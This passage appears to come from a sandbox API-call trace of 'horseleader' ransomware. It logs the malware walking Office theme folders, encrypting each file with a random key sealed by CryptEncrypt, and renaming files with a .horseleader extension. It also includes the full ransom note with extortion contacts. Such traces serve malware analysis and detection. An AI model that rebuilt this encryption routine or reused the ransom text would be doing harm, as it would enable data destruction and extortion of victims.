dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.463] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3613, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3613, lpOverlapped=0x0) returned 1 [0246.463] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.463] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.464] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.464] CloseHandle (hObject=0x1a4) returned 1 [0246.464] GetProcessHeap () returned 0x780000 [0246.464] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.464] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM.horseleader") returned 91 [0246.464] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.elm.horseleader")) returned 1 [0246.465] GetProcessHeap () returned 0x780000 [0246.465] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.465] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51cc30d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="COMPASS.INF", cAlternateFileName="")) returned 1 [0246.465] lstrcmpiW (lpString1="COMPASS.INF", lpString2="Windows") returned -1 [0246.465] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 79 [0246.465] StrStrIW (lpFirst="COMPASS.INF", lpSrch=".horseleader") returned 0x0 [0246.465] lstrcmpW (lpString1="COMPASS.INF", lpString2="#Decrypt#.txt") returned 1 [0246.465] lstrcmpW (lpString1="COMPASS.INF", lpString2="_uninstalling_.png") returned 1 [0246.465] lstrlenW (lpString=".testttjffg") returned 11 [0246.465] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF", lpSrch=".testttjffg") returned 0x0 [0246.465] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.466] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.466] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.466] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 79 [0246.466] StrStrW (lpFirst="COMPASS.INF", lpSrch=".txt") returned 0x0 [0246.466] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=486) returned 1 [0246.466] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1e6, lpOverlapped=0x0) returned 1 [0246.468] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.468] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1e6, lpOverlapped=0x0) returned 1 [0246.468] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.468] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.468] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.468] CloseHandle (hObject=0x1a4) returned 1 [0246.468] GetProcessHeap () returned 0x780000 [0246.468] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.469] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF.horseleader") returned 91 [0246.469] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\COMPASS\\COMPASS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf.horseleader")) returned 1 [0246.514] GetProcessHeap () returned 0x780000 [0246.514] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.514] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x50d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.515] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.515] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 79 [0246.515] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.515] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.515] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.515] lstrlenW (lpString=".testttjffg") returned 11 [0246.515] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.515] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.515] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.516] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.516] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 79 [0246.516] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.516] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1293) returned 1 [0246.516] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x50d, lpOverlapped=0x0) returned 1 [0246.519] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffaf3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.519] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x50d, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x50d, lpOverlapped=0x0) returned 1 [0246.520] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.520] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.520] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.520] CloseHandle (hObject=0x1a4) returned 1 [0246.520] GetProcessHeap () returned 0x780000 [0246.520] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.520] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.horseleader") returned 91 [0246.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.horseleader")) returned 1 [0246.521] GetProcessHeap () returned 0x780000 [0246.521] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.522] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x505f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.522] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.522] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 80 [0246.522] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 
[0246.522] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.522] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.522] lstrlenW (lpString=".testttjffg") returned 11 [0246.522] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.522] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.522] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.523] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.523] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 80 [0246.523] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.523] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=20575) returned 1 [0246.523] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.526] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.526] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.527] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5f, lpOverlapped=0x0) returned 1 [0246.527] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffffa1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.527] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5f, lpOverlapped=0x0) returned 1 [0246.527] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.527] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.528] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.528] CloseHandle (hObject=0x1a4) returned 1 [0246.528] GetProcessHeap () returned 0x780000 [0246.528] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.528] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.horseleader") returned 92 [0246.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.horseleader")) returned 1 [0246.532] GetProcessHeap () returned 0x780000 [0246.533] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.533] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x505f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.533] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.533] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\#Decrypt#.txt") returned 81 [0246.533] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.534] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.534] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.535] lstrlenA (lpString="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") returned 1368 [0246.535] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.535] CloseHandle (hObject=0x158) returned 1 [0246.535] GetProcessHeap () returned 0x780000 [0246.535] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.535] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CONCRETE", cAlternateFileName="")) returned 1 [0246.535] lstrcmpiW (lpString1="CONCRETE", lpString2="Windows") returned -1 [0246.535] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE") returned 68 [0246.535] lstrcmpW (lpString1="CONCRETE", lpString2=".") returned 1 [0246.535] lstrcmpW (lpString1="CONCRETE", lpString2="..") returned 1 [0246.535] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.535] GetProcessHeap () returned 0x780000 [0246.536] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.536] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*") returned 70 [0246.536] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.536] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.536] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\.") returned 70 [0246.536] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.536] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.536] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.536] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\..") returned 71 [0246.536] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0246.536] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.536] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ae7000, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51cc30d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2ae7000, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xb1d8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CONCRETE.ELM", cAlternateFileName="")) returned 1 [0246.536] lstrcmpiW (lpString1="CONCRETE.ELM", lpString2="Windows") returned -1 [0246.537] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 81 [0246.537] StrStrIW (lpFirst="CONCRETE.ELM", lpSrch=".horseleader") returned 0x0 [0246.537] lstrcmpW (lpString1="CONCRETE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.537] lstrcmpW (lpString1="CONCRETE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.537] lstrlenW (lpString=".testttjffg") returned 11 [0246.537] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.537] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.537] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.537] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
